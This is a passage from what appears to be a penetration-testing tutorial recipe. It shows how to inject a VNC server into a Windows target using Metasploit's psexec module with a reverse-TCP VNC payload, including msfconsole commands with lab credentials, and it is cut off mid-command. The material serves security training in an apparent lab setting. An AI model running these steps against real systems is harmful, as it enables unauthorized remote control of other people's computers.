The Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer (RFB) protocol to remotely control another computer.
We can inject a VNC server remotely using the Metasploit payload for the VNC injection. In this recipe, we will learn how to inject the VNC server remotely.
The VNC viewer must be installed on the host system to see the VNC session thrown by the target system. In this recipe, we will use the VNC viewer, which is already installed in Kali Linux.
We will use the Microsoft Windows Authenticated User Code Execution exploit module with the windows/vncinject/reverse_tcp
payload for injecting the VNC server remotely:
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBUSER Administrator SMBUSER => Administrator msf exploit(psexec) > set SMBPASS vagrant SMBPASS => vagrant msf exploit(psexec) > set RHOST 192.168.216.10 RHOST => 192.168.216.10 msf...